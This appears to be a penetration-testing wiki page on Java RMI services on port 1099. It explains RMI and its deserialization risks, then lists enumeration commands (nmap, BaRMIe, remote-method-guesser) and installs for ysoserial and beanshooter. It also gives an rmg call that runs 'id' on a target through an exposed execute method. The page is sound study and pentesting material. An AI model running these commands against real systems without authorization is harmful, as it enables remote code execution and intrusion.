Wiki
Powered by

# Java RMI - Port 1099

By
Adrien

# Concepts

Java Remote Method Invocation (RMI) is a mechanism that allows an object residing in one Java virtual machine (JVM) to invoke methods on an object running in another JVM. It uses object serialization to marshal and unmarshal parameters and does not strictly define a presentation layer, often relying on arbitrary Java classes.

Key Technical Details:

  • Registry: The RMI Registry (default port 1099) acts as a directory service, mapping logical names to object references.
  • Serialization: Heavily relies on Java Serialization, making it a frequent vector for Insecure Deserialization attacks.
  • Dynamic Class Loading: Can load classes from remote URLs (codebase), historically leading to RCE if not properly restricted (JEP 290).

# Enumeration

# Nmap

Identify the RMI registry and dumped exposed methods.

nmap -sV -p 1099 --script rmi-dumpregistry <target>

# BaRMIe

Enumeration and attack tool for RMI services.

java -jar BaRMIe_v1.0.1.jar -h 192.168.1.10 -p 1099

# RMG Recon

Github Link : https://github.com/qtc-de/remote-method-guesser

remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.

# Install

First you'll need to install maven

sudo apt-get -y install maven

Then

git clone https://github.com/qtc-de/remote-method-guesser
cd remote-method-guesser
mvn package

Once installed, you need to download ysoserial.jar here :

wget https://github.com/frohoff/ysoserial/releases/download/v0.0.6/ysoserial-all.jar

# Enumerate 

rmg enum <ip> 9010

# Timestamp

Get the objid from the previous result

rmg objid '[55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]'

# Execute MEthod (Shell)

Only if the method is available on the rmi service

rmg call 172.17.0.2 9010 '"id"' --bound-name plain-server --signature "String execute(String dummy)" --plugin GenericPrint.jar

# Brute Force Methodes 

rmg guess 172.17.0.2 9010

# Beanshooter

Github Link : https://github.com/qtc-de/beanshooter

# Install

First you'll need to install maven

sudo apt-get -y install maven

Clone the repo and build it

git clone https://github.com/qtc-de/beanshooter
cd beanshooter
mvn package

Or you can just get the jarfile from the release page and then

java -jar file.jar -h

© Copyright 2025. All rights reserved.